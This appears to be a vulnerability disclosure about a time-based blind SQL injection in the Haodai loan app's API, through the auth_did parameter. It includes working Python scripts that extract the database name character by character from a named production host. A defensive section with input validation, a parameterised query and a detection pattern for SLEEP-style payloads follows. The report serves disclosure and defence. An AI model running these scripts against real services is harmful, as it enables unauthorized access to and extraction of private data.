SQL injection vulnerability in the APP
The "Haodai" (good loan) app of Haodai Network has a time-based blind SQL injection on the following URL. The injectable parameter is auth_did.

http://interface.api.haodai.com/capi/sys/up_push_code?os_type=1&appid=2&imei=A0000000000000&app_version=27000&auth_tms=20150927122749&auth_did=218372&auth_dsig=signature&auth_uid=402888&auth_usig=signature&pushcode=signature
I found that I couldn't run it with SQLMap. Looking at it manually, I found that the greater-than and less-than signs are filtered, so I wrote a Python script and ran the following steps.

1. Get the length of the database name. Payload:

    and sleep(IF((select length(DATABASE()))=1,5,0))

```python
import requests, time

# Step 1: try candidate lengths; the request that takes ~5 s longer is the hit.
for i in range(21):
    url = (r'http://interface.api.haodai.com/capi/sys/up_push_code?os_type=1&appid=2'
           r'&imei=A0000000000000&app_version=27000&auth_tms=20150927122749'
           r'&auth_did=218372%20AND%20SLEEP%28IF%28%28SELECT%20LENGTH%28DATABASE%28%29%29%29='
           + str(i) + r',5,0%29%29'
           r'&auth_dsig=7e63707f4c2c0000c&auth_uid=402888&auth_usig=c28be912f3a53c23&pushcode=pai')
    st = time.time()
    r = requests.get(url)
    print('length:', i, time.time() - st)
```

Result: LENGTH(DATABASE()) = 16.

2. Get the database name. Payload:

    and sleep(IF(ascii(mid(database(),1,1))=33,10,0))

```python
import requests, time

# Step 2: for each of the 16 positions, test ASCII codes one by one;
# a response delayed by more than 10 s confirms the character.
database = ''
for j in range(16):
    i = 33
    while i < 127:  # upper bound assumed (printable ASCII); the original loop condition was lost in extraction
        url = (r'http://interface.api.haodai.com/capi/sys/up_push_code?os_type=1&appid=2'
               r'&imei=A0000000000000&app_version=27000&auth_tms=20150927122749'
               r'&auth_did=218372 And sleep(IF(ascii(mid(database(),' + str(j + 1) + ',1))=' + str(i) + ',10,0))'
               r'&auth_dsig=7e63707f4c2c316c&auth_uid=402888&auth_usig=c28be912f3a53c23'
               r'&pushcode=ed0e046ea6e40d71a4ba375cc010decd')
        st = time.time()
        r = requests.get(url)
        if time.time() - st > 10:
            database = database + chr(i)
            print('database_name:', database)
            break
        i = i + 1
```
Database name obtained: interface_hd_com.
Solution:
Parameter Filtering
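As an added illustration of that fix (example code, not from the report or the vendor), the block below shows both halves of the defence for the auth_did parameter: an integer allowlist plus a bound query on the application side, and a log-side check that flags delay-function calls like the SLEEP(IF(...)) payloads above. The request lines, table and pushcode value are constructed.

```python
import re
import sqlite3
from urllib.parse import urlsplit, parse_qs, unquote_plus

# Constructed request lines (not from the report): one benign request and two carrying
# the time-based payload shape seen in the auth_did parameter, one URL-encoded, one not.
SAMPLE_REQUESTS = [
    "/capi/sys/up_push_code?os_type=1&appid=2&auth_did=218372&auth_uid=402888",
    "/capi/sys/up_push_code?os_type=1&appid=2&auth_did=218372%20AND%20SLEEP%28IF%28%28SELECT"
    "%20LENGTH%28DATABASE%28%29%29%29%3D16%2C5%2C0%29%29&auth_uid=402888",
    "/capi/sys/up_push_code?os_type=1&appid=2&auth_did=218372+And+sleep(IF(ascii(mid(database(),1,1))=105,10,0))&auth_uid=402888",
]
# Parameters that must be plain integers; anything else is rejected before it reaches SQL.
INTEGER_PARAMS = {"os_type", "appid", "app_version", "auth_tms", "auth_did", "auth_uid"}
INTEGER_RE = re.compile(r"[0-9]{1,20}")
# Markers of time-based blind injection: a delay-function call, as in the report's payloads.
TIME_BASED_RE = re.compile(r"\b(sleep|benchmark|pg_sleep|waitfor)\s*\(", re.IGNORECASE)

def validate_params(query):
    """Allowlist check: returns the names of integer parameters whose value is not all digits."""
    bad = []
    for name, values in parse_qs(query, keep_blank_values=True).items():
        if name in INTEGER_PARAMS and any(not INTEGER_RE.fullmatch(v) for v in values):
            bad.append(name)
    return sorted(bad)

def detect_time_based(request_line):
    """Detection side: decode each parameter value and report those containing a delay-function call."""
    query = urlsplit(request_line).query
    return sorted(name for name, values in parse_qs(query, keep_blank_values=True).items()
                  if any(TIME_BASED_RE.search(unquote_plus(v)) for v in values))

def triage(request_lines):
    """Per request: (parameters flagged by detection, parameters that fail validation)."""
    return [(detect_time_based(r), validate_params(urlsplit(r).query)) for r in request_lines]

def demo_db():
    """In-memory table with one constructed row, so lookup_push_code can be exercised offline."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE devices (auth_did INTEGER PRIMARY KEY, pushcode TEXT)")
    conn.execute("INSERT INTO devices VALUES (218372, 'constructed-pushcode')")
    return conn

def lookup_push_code(conn, auth_did):
    """Fix side: reject non-integer input, then bind the value instead of concatenating it into SQL."""
    if not INTEGER_RE.fullmatch(auth_did):
        raise ValueError("auth_did must be an integer")
    row = conn.execute("SELECT pushcode FROM devices WHERE auth_did = ?", (int(auth_did),)).fetchone()
    return row[0] if row else None
```

With the bound query, even input that slips past the allowlist is compared as a value rather than executed, so the SLEEP branch never runs.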